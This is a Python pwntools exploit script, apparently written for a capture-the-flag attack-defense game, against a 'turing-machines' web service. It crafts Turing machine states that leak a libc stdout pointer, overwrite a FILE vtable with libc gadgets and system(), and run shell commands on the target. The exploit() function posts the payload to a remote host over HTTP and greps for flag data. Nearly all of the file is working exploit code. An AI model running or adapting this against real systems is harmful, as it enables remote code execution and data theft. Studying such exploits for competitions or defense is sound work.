import json
import os
from binascii import hexlify

import requests

os.environ['PWNLIB_NOTERM'] = '1'

from pwn import *
context.arch = 'amd64'


class TuringMachine:
    def __init__(self, name):
        self.name = name
        self.states = []

    def add_state(self, name, actions):
        self.states.append({'name': name, 'actions': actions or []})

    def json(self):
        return json.dumps({'name': self.name, 'states': self.states})

    def json_states(self):
        return json.dumps(self.states)

    def write_constant(self, prefix, final_h, final_s, value):
        """
        Write a 8b constant to tape. Then move the head by <final_h> bytes and go to state <final_s>
        :param prefix: Name of the states: <prefix>0-<prefix>7
        :param final_h:
        :param final_s:
        :param value:
        :return:
        """
        for i in range(7):
            v = value & 0xff
            value = value >> 8
            self.add_state(f'{prefix}{i}', [{'a': [f'h={v}'], 'h': 1, 's': f'{prefix}{i + 1}'}])
        self.add_state(f'{prefix}7', [{'a': [f'h={value}'], 'h': 1 + final_h, 's': final_s}])

    def read_into_r07(self, prefix, final_h, final_s):
        """
        Copy 8 bytes from tape to registers r0..r7. Then move the head by <final_h> bytes and go to state <final_s>
        :param prefix: Name of the states: <prefix>0-<prefix>7
        :param final_h:
        :param final_s:
        :return:
        """
        for i in range(7):
            self.add_state(f'{prefix}{i}', [{'a': [f'r{i}=h'], 'h': 1, 's': f'{prefix}{i + 1}'}])
        self.add_state(f'{prefix}7', [{'a': [f'r7=h'], 'h': 1 + final_h, 's': final_s}])

    def read_into_r8f(self, prefix, final_h, final_s):
        """
        Copy 8 bytes from tape to registers r8..rf. Then move the head by <final_h> bytes and go to state <final_s>
        :param prefix: Name of the states: <prefix>0-<prefix>7
        :param final_h:
        :param final_s:
        :return:
        """
        for i in range(7):
            self.add_state(f'{prefix}{i}', [{'a': [f'r{hex(i + 8)[2:]}=h'], 'h': 1, 's': f'{prefix}{i + 1}'}])
        self.add_state(f'{prefix}7', [{'a': [f'rf=h'], 'h': 1 + final_h, 's': final_s}])

    def write_r07(self, prefix, final_h, final_s):
        """
        Copy 8 bytes from registers r0..r7 to tape. Then move the head by <final_h> bytes and go to state <final_s>
        :param prefix: Name of the states: <prefix>0-<prefix>7
        :param final_h:
        :param final_s:
        :return:
        """
        for i in range(7):
            self.add_state(f'{prefix}{i}', [{'a': [f'h=r{i}'], 'h': 1, 's': f'{prefix}{i + 1}'}])
        self.add_state(f'{prefix}7', [{'a': [f'h=r7'], 'h': 1 + final_h, 's': final_s}])

    def write_r8f(self, prefix, final_h, final_s):
        """
        Copy 8 bytes from registers r8..rf to tape. Then move the head by <final_h> bytes and go to state <final_s>
        :param prefix: Name of the states: <prefix>0-<prefix>7
        :param final_h:
        :param final_s:
        :return:
        """
        for i in range(7):
            self.add_state(f'{prefix}{i}', [{'a': [f'h=r{hex(i + 8)[2:]}'], 'h': 1, 's': f'{prefix}{i + 1}'}])
        self.add_state(f'{prefix}7', [{'a': [f'h=rf'], 'h': 1 + final_h, 's': final_s}])

    def sub8(self, prefix, final_h, final_s, value):
        """
        Subtract value from the 8byte little-endian value under head
        :param prefix:
        :param final_h:
        :param final_s:
        :param value:
        :return:
        """
        for i in range(7):
            v = value & 0xff
            value = value >> 8
            self.add_state(f'{prefix}{i}', [
                {'c': f'h<{v}', 'a': [f'h=h-{v}'], 'h': 1, 's': f'{prefix}{i+1}_1'},
                {'c': f'h>={v}', 'a': [f'h=h-{v}'], 'h': 1, 's': f'{prefix}{i+1}'},
            ])
            self.add_state(f'{prefix}{i}_1', [
                {'c': f'h<{v+1}', 'a': [f'h=h-{v+1}'], 'h': 1, 's': f'{prefix}{i+1}_1'},
                {'c': f'h>={v+1}', 'a': [f'h=h-{v+1}'], 'h': 1, 's': f'{prefix}{i+1}'},
            ])
        v = value & 0xff
        self.add_state(f'{prefix}7', [
            {'a': [f'h=h-{v}'], 'h': 1 + final_h, 's': final_s},
        ])
        self.add_state(f'{prefix}7_1', [
            {'a': [f'h=h-{v+1}'], 'h': 1 + final_h, 's': final_s},
        ])


def build_exploiting_machine(command: str):
    tape = b'\x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000XYZ'
    machine = TuringMachine('exploit')
    # move head to tapeStart
    machine.add_state('initial', [{'a': [], 'h': 0x28, 's': 'writeTapeStart0'}])
    # write 0 to tapeStart, and -1 to tapeEnd
    machine.write_constant('writeTapeStart', 0, 'writeTapeEnd0', 0)
    machine.write_constant('writeTapeEnd', 0, 'readHead0', 0xffffffffffffffff)
    # r0-r7 = head, r8-rf = stdout (libc leak)
    machine.read_into_r07('readHead', 0x20, 'readStdout0')
    machine.read_into_r8f('readStdout', -0x48, 'writeVtablePtr0')

    # some gadgets from libc, all offsets relative to stdout's target
    libc = ELF('./libc-2.36.so')
    # libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
    system = libc.symbols['system'] - libc.symbols['_IO_2_1_stdout_']
    # mov rdi, rbp ; call qword ptr [rax + 0x20]
    gadget_movrdirbp_call20 = list(libc.search(asm('mov rdi, rbx ; call qword ptr [rax + 0x20]'), executable=True))[0] - libc.symbols['_IO_2_1_stdout_']
    # call qword ptr [rax + 0x18]
    gadget_call18 = list(libc.search(asm('call qword ptr [rax + 0x18]'), executable=True))[0] - libc.symbols['_IO_2_1_stdout_']

    # write vtable ptr to 0x20 (= head-0x38-0x30)
    machine.write_r07('writeVtablePtr', -8, 'subVtablePtr0')
    machine.sub8('subVtablePtr', -0x28-0x30 + 8, 'writeGadget10', 0x38+0x30)  # afterward: head to vtable+0x08
    # write gadget1
    machine.write_r8f('writeGadget1', -8, 'subGadget10')
    machine.sub8('subGadget1', 8, 'writeSystem0', -gadget_movrdirbp_call20)
    # write system
    machine.write_r8f('writeSystem', -8, 'subSystem0')
    machine.sub8('subSystem', 0, 'writeGadget20', -system)
    # write gadget2
    machine.write_r8f('writeGadget2', -8, 'subGadget20')
    machine.sub8('subGadget2', 0x68, 'command0', -gadget_call18)  # afterward: head to reporter / payload place

    for i, b in enumerate(command.encode()):
        machine.add_state(f'command{i}', [{'a': [f'h = {b}'], 'h': 1, 's': f'command{i + 1}'}])
    machine.add_state(f'command{len(command.encode())}', [])  # terminal state
    """
            | ...            |
            |----------------|
vtable 0x00 | ?              | <-- rax    <-- vtable
vtable 0x08 | gadget 1       | --> mov rdi, rbp ; call [rax+0x20]
vtable 0x10 | ?              |
vtable 0x18 | system         |
vtable 0x20 | gadget 2       | --> call [rax+0x18]
            |----------------|
     
            |----------------|
       0x00 | 00 X Y Z ...   | <tape>     5 bytes
            |----------------|
       0x20 | &"vtable 0x00" | <machine> 56 bytes  <-- rdi   --> vtable
       0x28 | 0x00000000     |  .tapeStart
       0x30 | 0xffffffff     |  .tapeEnd  
       0x38 |                |  .head
            | ...            |
       0x48 | &head          |  .registers 0-7
       0x50 | stdout         |  .registers 8-f
            |----------------|
       0x60 | "cat *.json"   | <payload>  <-- rbp
            |----------------|
            | ...            |
    """

    return machine, tape


def check_exploit_local():
    machine, tape = build_exploiting_machine('id ; pwd ; ls /')
    with open('machine.json', 'w') as f:
        f.write(machine.json())
    with open('tape', 'wb') as f:
        f.write(tape)
    os.chdir('../service')
    os.system('./turing-machines -tape=../exploits/tape ../exploits/machine.json > turingcode/testcode.cpp')
    print('---')
    sys.stdout.flush()
    os.system('./turing-machines -tape=../exploits/tape -run ../exploits/machine.json')


def random_string(l):
    return ''.join(random.choice(string.ascii_letters) for _ in range(l))


def exploit(target):
    machine, tape = build_exploiting_machine('id ; pwd ; grep -ohE "SAAR\\\\{[A-Za-z0-9_-]+\\\\}" data/*.json')
    s = requests.Session()
    response = s.post(f'http://{target}:2080/machine/new', data={'name': random_string(16), 'states': machine.json_states()})
    print(response.url)
    ident = response.url.split('/')[-1]
    response = s.post(f'http://{target}:2080/machine/run/{ident}', data={'tape': hexlify(tape).decode(), 'ident': ident, 'action': 'run'})
    print(response)
    if '<pre>' not in response.text:
        print(response.text)
    else:
        print(response.text.split('<pre>', 1)[1].rsplit('</pre>', 1)[0])


if __name__ == '__main__':
    # check_exploit_local()
    exploit(sys.argv[1] if len(sys.argv) > 1 else 'localhost')
